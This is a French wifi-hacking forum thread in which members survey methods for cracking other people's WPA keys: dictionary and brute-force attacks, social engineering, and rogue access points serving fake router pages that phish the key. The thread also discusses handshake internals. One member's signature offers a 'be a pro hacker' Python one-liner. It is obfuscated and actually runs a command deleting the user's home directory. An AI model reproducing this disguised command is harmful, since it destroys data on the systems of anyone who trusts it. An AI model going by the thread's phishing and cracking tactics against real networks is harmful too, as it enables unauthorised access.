Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-01-2009 20:34:22

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Crack de clé WPA: le bilan de la situation

Depuis le temps que l'on s'intéresse au crack WPA, il est intéressant de faire un petit bilan pour voir ou nous en sommes en ce qui concerne les différents moyens de s'attaquer à du WPA:

-

Les attaques dictionnaire et bruteforce

Le principe est connu de tous, récupération d'un handshake, puis attaque aircrack-ng ou airolib-ng avec des dicos. Les détails sont ici: Tutoriel crack de clé WPA avec aircrack-ng et Tutoriel crack de clé WPA avec airolib-ng. Selon les points d'accès visés, ce type d'attaque est impossible à mettre en oeuvre, car beaucoup trop long (je pense par exemple aux Livebox qui utilisent une passphrase par défaut de 26 caractères en héxadécimal, ainsi qu'aux Neufbox dont la passphrase d'origine fait 20 caractères). Toutefois, pour des points d'accès configurés manuellement par l'utilisateur, un bon gros dico bien optimisé peut donner des résultats intéressants.

En complément aux attaques dicos, une attaque en bruteforce pur peut etre envisagée grace à ElcomSoft Distributed Password Recovery. Ce programme permet de bruteforcer un handshake, de plus il permet de distribuer le crack selon une architecture clients/serveur en faisant travailler plusieurs ordinateurs simultanément sur le crack. L'autre point fort du soft est qu'il est compatible Cuda, il peut ainsi utiliser les ressources GPU pour booster la vitesse de bruteforce. Nous sommes en train de tester cette méthode de crack: Challenge Elcomsoft Distributed Password Recovery: crack WPA distribué sur notre serveur privé, toute personne souhaitant rejoindre notre challenge est la bienvenue. Ce type de bruteforce est très gourmand en ressources, mais c'est un sérieux atout en complément aux attaques dictionnaires, et le crack distribué est appelé à se développer si nous voulons améliorer les chances de réussite d'un crack de clé WPA. Dans une dynamique d'attaque dicos + bruteforce, Edpr est à l'heure actuelle incontournable.

-

Le social engineering

Il est parfois plus efficace de ruser et d'utiliser son bagout que de faire tourner des machines sur un crack pendant des semaines. Cette méthode est donc susceptible de donner des résultats...

Plus d'infos: Ingénierie sociale (sécurité de l'information).

-

Le reverse engineering, découvrir les algorithmes qui ont généré les clés WPA par défaut

Le sujet a déja été abordé sur le forum: Livebox Inventel WPA et Neufbox V4 Firmware, mais ce type d'exercice requiert des connaissances et compétences très poussées qu'aucun d'entre nous ne possède, et nous ne savons à l'heure actuelle pas grand chose sur la manière dont ont été générées les clés WPA par défaut des Livebox et Neufbox. Bien évidemment, si l'un de ces algorithmes de génération était rendu public, cela serait un énorme bond en avant, voila donc une piste à ne pas négliger...

-

Rogue AP & Airbase-ng: l'attaque du client

Nous avons dernièrement travaillé sur des attaques par rogue AP, et développé quelques scripts et pages d'interfaces d'administration de box demandant à l'utilisateur de valider sa clé WPA suite à une mise à jour: Technique de recuperation de clef WPA par rogue et PHP, GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP et Les pages rogue AP finalisées: le topic dédié. Le but était de lancer une rogue AP imitant le point d'accès légitime, de faire en sorte que le client s'y connecte et de le rediriger vers les pages d'administration "fake". Malheureusement, airbase-ng ne permet pas de duper des clients connectés en WPA, et nous n'avons trouvé que 2 alternatives permettant ce type d'attaque: l'utilisation de tkiptun-ng (dont nous allons parler dans la prochaine section) ou le cas ou le client dévoile la liste des réseaux wifi auxquels il va se connecter de manière automatique. Cela limite donc la portée de notre attaque par rogue AP, mais nous continuons à travailler sur cette piste extrèmement intéressante. Atrax a d'ailleurs développé l' Outil AtxWPA à tester, qui utilise une méthode sensiblement différente que celle visée par GTWPA. En effet, AtxWPA va directement aller récupérer dans la base de registre les clés des réseaux wifi ainsi que d'autres informations, un outil très puissant donc.

-

Tkiptun-ng: not fully working

L'outil qui a tant fait parler de lui il y a peu, Tkiptun-ng, semble réellement très difficile à exploiter. Nous avions pensé à l'utiliser pour rediriger le client victime de l'attaque rogue AP vers notre serveur rogue, mais cela s'avère bien plus délicat que prévu. En effet, l'injection en WPA n'en est qu'à ses prémices et tout reste à faire: Injection de paquets d'une capture airodump (.cap) en WPA TKIP. Bref, à ce niveau là aussi il y a encore du pain sur la planche pour tous ceux qui veulent faire avancer les choses.


A travers ce petit tour d'horizon, j'ai essayé de résumer les choses histoire de faire un petit bilan. Je pense avoir été relativement complet, d'autant que chaque thème abordé contient des liens qui donnent des explications détaillées. Comme on peut le voir, le WPA est toujours bel et bien un encryptage fort qui est loin d'avoir dit son dernier mot, mais les choses avancent et le forum regorge d'informations intéressantes ainsi que de pistes à suivre. Alors ne relachons pas nos efforts, et continuons la quete wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-01-2009 20:52:55

ex-tel
Banni(e)
Lieu : FRANCE
Inscription : 31-12-2008
Messages : 255

Re : Crack de clé WPA: le bilan de la situation

Genial ! cool


wifiso2.png

Hors Ligne

#3 15-01-2009 04:32:05

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Crack de clé WPA: le bilan de la situation

Beau récapitulatif,
merci M1ck3y wink

Hors Ligne

#4 15-01-2009 21:34:56

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Crack de clé WPA: le bilan de la situation

Yep, excellent résumé de la situation capitaine! cool


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#5 20-01-2009 00:56:38

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Crack de clé WPA: le bilan de la situation

J'ai une question au sujet du thème "Rogue AP & Airbase-ng: l'attaque du client" :

J'ai lu dans les divers topics sur ce sujet que le client envoyait des données cryptés en WPA.
Sachant cela, est-ce possible d'usurper la place du modem du client ?

En effet, il me semble que le principe de cette attaque est de faire en sorte que le client se connecte à notre AP à la place de son point d'accès habituel (et même lui offrir la possibilité de surfer sur internet afin qu'il ne se rende compte de rien).
Mais si les données que le client envoi sont cryptés est-ce qu'il y a une chance que l'on puisse se faire passer pour son point d'accès habituel ?

Hors Ligne

#6 20-01-2009 12:58:08

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Crack de clé WPA: le bilan de la situation

La connexion d'un client sur une rogue AP en WPA avec airbase-ng n'est pas facile à établir. Tous les tests que l'on a fait avec airbase-ng ont échoué, si tu veux faire quelques tests je t'invite à faire une petite recherche sur le forum et lire les différents topics qui traitent du sujet. Comme on a de la suite dans les idées et qu'on ne lache pas l'affaire, on a trouvé 2 pistes qui peuvent permettre de réussir cette connexion avec le client:

-Exploiter une faille de l'utilitaire wifi windows qui, lorsqu'il n'est pas à jour, diffuse en clair la liste des points d'accès auxquels la station va se connecter de manière automatique. Dans ce cas, il suffit de lancer une rogue AP avec l'un des essids dévoilés par la station, et si la connexion était configurée en OPN ou en WEP on pourra établir la connexion avec le client.

-Utiliser tkiptun-ng pour rediriger le client. C'est possible, en théorie, mais tkiptun-ng est un outil assez récent très difficile à exploiter, et il y a encore pas mal de boulot à faire de ce coté là.

Prends le temps de lire les topics dont je donne les liens dans le bilan, ils sont très instructifs wink

Hors Ligne

#7 20-01-2009 13:00:02

Mr. M
Membre d'honneur
Inscription : 29-10-2008
Messages : 1 036

Re : Crack de clé WPA: le bilan de la situation

Pour ma part, j'ai testé le bruteforce avec ces fameuses attaques dico, mais le social engineering a donné de très bons résultats ! tongue La fin justifie les moyens.


footer.jpg

Hors Ligne

#8 20-01-2009 19:21:05

Energy
Membre
Inscription : 10-01-2009
Messages : 15

Re : Crack de clé WPA: le bilan de la situation

.

Dernière modification par Energy (14-03-2009 03:41:57)

Hors Ligne

#9 20-01-2009 19:31:24

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Crack de clé WPA: le bilan de la situation

Bonsoir Energy, bienvenue sur le forum wink

Quand je parlais de "broadcast", ce terme désigne le fait de diffuser les essids. Tu le vois facilement sous airodump-ng lorsqu'une station affiche d'autres essids que celui du point d'accès auquel elle est connectée. Ca signifie qu'elle va se connecter automatiquement à n'importe lequel de ces AP, il ne reste qu'à lancer airbase-ng en utilisant ces différents essids les uns après les autres jusqu'à ce que la station se connecte. Un petit coup de déauth peut bien sur aider si besoin.

Hors Ligne

#10 25-03-2009 14:23:09

webcapitain
Membre Indéboulonnable
Inscription : 21-11-2008
Messages : 143

Re : Crack de clé WPA: le bilan de la situation

Content de voir que pas mal de monde s'interesse a ce fameux GTWPA

Hors Ligne

#11 28-01-2010 21:38:47

kveen
N00b
Inscription : 25-01-2010
Messages : 3

Re : Crack de clé WPA: le bilan de la situation

super intéressant!! merci

Hors Ligne

#12 12-02-2010 15:33:47

meda
N00b
Inscription : 12-02-2010
Messages : 2

Re : Crack de clé WPA: le bilan de la situation

merci

Hors Ligne

#13 05-07-2010 00:22:50

vixpac
N00b
Lieu : La Mecque
Inscription : 05-07-2010
Messages : 1

Re : Crack de clé WPA: le bilan de la situation

merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii:lol:


domain-d76524f7e8.jpg

Hors Ligne

#14 18-01-2011 23:20:15

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Crack de clé WPA: le bilan de la situation

Chapeau.
Je me demande si on ne peut pas écouter plus que le 4-way-handsake pour le wpa "1".
Par exemple, suivre en live la construction de la PTK pour pouvoir décoder la seconde phase cryptée dans le protocole d'authentification, avec le 2-ways-handshake et sa GTK.
Une écoute complète donc,  sans attaque. Sauf une petite déauth, pour réécouter, ca n'a jamais fait de mal à personne.

Je creuse un peu et je vous dis.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#15 18-01-2011 23:28:03

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Crack de clé WPA: le bilan de la situation

Le handshake et je pense inviolable il faudrai etre un genie de la cryptographie pour arriver a le décrypter je pense wink

Hors Ligne

#16 08-02-2011 04:52:48

adarkar
N00b
Inscription : 08-02-2011
Messages : 2

Re : Crack de clé WPA: le bilan de la situation

Bonsoir, ou bon matin, tout est relatif.

Excusez moi de poser des questions aussi stupides mais je ne connais presque rien dans le domaine du piratage réseau, mon truc a moi c'est le codage, bref...

Est ce que quelqu'un pourrait m'expliquer pourquoi on ne pourrait pas sniffer pendant que le pc victime se connecte au routeur, et faire une copie des paquets envoyés par le client pendant sa connexion au routeur pour ensuite essayer plus tard, tout en ayant pris soin de changer son adresse MAC, de renvoyer ces mêmes paquets au routeur, dans le bon ordre bien sur afin d'établir une connexion durable.
Même si ca ne permet pas d'obtenir la clé WPA on pourrait pas quand même tenter d'administrer la box (en supposant que les ID constructeur n'aient pas été changés bien sur)?

Je vous pose la question parce que je sais que vous serez a même de m'éclairer la dessus vu mon niveau d'incompétence en adm réseau.

Et sinon quelqu'un a-t'il réussi en partant de la clé wep pour trouver la wpa?
J'en ai entendu parler mais là j'avoue que je comprends pas le principe... je vois pas le lien entre les deux

PS: super travail sur GTWPA pour l'équipe! Et dommage que Atrax soit aux abonnés absent car son tool avait l'air plus que prometteur.

Dernière modification par adarkar (08-02-2011 07:25:35)


- tu sais les antibiotiques, ca sert a rien si c'est viral
- t'as raison, mais je fait quoi alors? Antivirus?

---------------AVAST, c'est pas automatique----------

Hors Ligne

#17 08-02-2011 16:16:43

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Crack de clé WPA: le bilan de la situation

Salut adarkar, bienvenue sur le forum smile

Ta question n'est pas "stupide", par contre tu te doutes bien que si c'était aussi simple le WPA serait mort depuis longtemps smile

En fait, le WPA se base sur un système (astucieux) appelé "challenge/response" qui fait que la clé ne circule jamais en clair. Pour se connecter, le fonctionnement de base est le suivant :
- l'AP envoie un challenge (une "phrase" aléatoire) que le client doit pouvoir chiffrer avec la clé et renvoyer
- le client reçoit le challenge, utilise la clé qu'il connaît pour le chiffrer, et le renvoie à l'AP. Ce dernier vérifie que le challenge a été correctement chiffré, et si c'est bon il accepte le client.

Comme le challenge envoyé est aléatoire, tu ne peux évidemment pas réutiliser une réponse précédente puisqu'elle a toutes les chances de ne pas être bonne wink Et au cas où tu te poserais la question de savoir si on peut déduire la clé à partir de la réponse fournie par le client, non c'est virtuellement impossible... La vraie clé est elle-même hashée 4096 fois en SHA1 avant d'être utilisée (fonction PBKDF2) ; inverser une seule ronde de SHA1 c'est déjà pas gagné, mais 4096 fois c'est mort tongue

Pour le lien entre WEP et WPA, tu as raison il n'y a aucun lien entre les 2. Certains constructeurs utilisent un algorithme perso pour générer la clé WPA à partir de la clé WEP mais c'est assez rare, et ce n'est pas du tout lié aux standards...

Hors Ligne

#18 09-02-2011 23:52:21

Le_Boss_du_WPA
Nouveau membre
Inscription : 04-02-2011
Messages : 7

Re : Crack de clé WPA: le bilan de la situation

tes explciations sont d'une clarté redoutable

Hors Ligne

#19 07-03-2011 04:09:25

hotmil
Nouveau membre
Inscription : 07-03-2011
Messages : 5

Re : Crack de clé WPA: le bilan de la situation

Bonsoir,je voudrais vous demander après les explications de antares145 n'y aurait il pas moyen de recevoir le challenge crypté du client toute en empêchent l'AP de le recevoir (je divague mais c'est purement théorique ) pour le réenvoyer en se faisant passer pour le client et ainsi se connecté a l'AP a sa place tout sa dans un lapse de temps très court pour ne pas avoir une autre demande d'auth de l'AP.

ou bien d'autre processus empêche cela?ou j'ai vraiment rien compris au explication fournie par antares145?

Je me doute que si c'était aussi simple ils auraient trouvés depuis longtemps mais bon on se couche toujours moins bête.

Hors Ligne

#20 07-03-2011 14:12:11

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Crack de clé WPA: le bilan de la situation

Salut wink

On peut utiliser wireshark pour étudier le handshake mais s'incruster dans le handshake et se faire passer pour le client j'y ai pensé mais je doute que techniquement sa soit possible hmm

Hors Ligne

#21 07-03-2011 15:33:04

hotmil
Nouveau membre
Inscription : 07-03-2011
Messages : 5

Re : Crack de clé WPA: le bilan de la situation

salut koala mais est-ce que déjà techniquement il y aurait moyen de se faire passé pour le client en changent l'adresse mac,nom de l'ordinateur et autre caractère que demande l'AP.

Puis d'empecher le challenge (ou handshake) crypté envoyer par le client d'arriver a l'AP?

Eit sinon comment faire la différence dans les données recu entre le challenge aléatoire et le crypté?

Parce qu'il s'agirait d'agir comme un filtre entre les données envoyées et recu entre l'ap et le client,sur du LAN c'est réalisable mas en wifi aucune idée.

PS: merci pour ta réponse koala.

Hors Ligne

#22 07-03-2011 19:15:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Crack de clé WPA: le bilan de la situation

Je ne vois pas de moyen d'empecher l'ap de recevoir le message chiffré du client surtout si après tu veux prendre la place de ce dernier, sinon sous wireshark tu peux facilement voir le handshake entre l'ap et la station wink

Hors Ligne

#23 08-03-2011 00:31:13

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Crack de clé WPA: le bilan de la situation

Le "problème" c'est que le handshake a été précisément conçu pour ne pas être interrompu, sinon on recommence tout smile Par ailleurs, son but est une authentification mutuelle, donc il est quasiment impossible de s'incruster au milieu d'un handshake en live hmm

2 problèmes majeurs ici :
- interrompre totalement la communication entre la station et l'AP : hyper-difficile en WiFi, puisque le medium (le vide, ou l'air) ne peut pas être contrôlé. Ce n'est pas impossible (avec des antennes directionnelles, une carte un peu puissante, du jamming pour brouiller tout en dessous d'un certain seuil et surtout un timing parfait), mais ça reste un challenge technique considérable !
- Les différents paquets du handshake contiennent un MIC, qui est une sorte de compteur anti-rejeu ainsi qu'une clé (dérivée de la PMK) qui prouve que l'émetteur connaît la clé. Donc si on ne connaît pas la passphrase, on ne saura pas "signer" notre paquet avec le bon MIC et on se fera jeter hmm

Plus de détails (techniques...) si ça vous intéresse
--> Urban Legend [sid.rstack.org] (détails sur l'authentification mutuelle)
--> Man in the Middle sur WPA ? [sid.rstack.org] (deuxième moitié de l'article, sur le MITM "physique" en WiFi)
--> Indoor WLAN Design (pages 19 à 21 pour les détails sur le 4-Way handshake)

Hors Ligne

#24 08-03-2011 00:37:13

hotmil
Nouveau membre
Inscription : 07-03-2011
Messages : 5

Re : Crack de clé WPA: le bilan de la situation

ok c'est mort quoi lol

merci pour les liens

Dernière modification par hotmil (08-03-2011 00:37:45)

Hors Ligne

#25 15-06-2011 16:50:32

MIG
Membre
Inscription : 07-06-2011
Messages : 18

Re : Crack de clé WPA: le bilan de la situation

merci pour ce topic particulièrement intéressant sur la situation actuelle du crack WPA
inscrit depuis peu sur le forum je fouine sur le sujet et j'en déduis que la meilleur solution est bien le reverse engineering du matériel
n'ayant jusqu’à présent pratiqué cette discipline que sur des cibles logiciel je n'ai aucune idée de la facon
de proceder pour lancer un debugger sur du materiel
il faudrait probablement dépouiller une box , l'interfacer (solide connaissance en électronique que je n'ai pas )
et lire son code en situation
enfin du lourd ... mais que je pense possible
et aussi posséder une bonne petite base de données des étiquettes constructeur
les livebox et sfrbox me paraissent les plus complexe
mais il est probable que après la faille découverte sur les BBOX que l'algo de génération de clef de celles de nouvelle génération ne soit pas si différente de l'ancien
(je l'ai constaté sur des softs, ou les programmeurs se limitaient a quelque manip de string avant passage au hash)
les feignants c'est du taf de pondre un algo solide )
voila je ne sais pas trop ou en sont les recherches sur cette box (n'hesitez pas à me mettre quelque liens)
en attendant je peux fournir (en MP ET UNIQUEMENT aux admins du site qui se chargeront de du displash) des étiquettes de box
en aucun cas de façon public
voila en espérant pouvoir apporter ma pierre a l'édifice.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]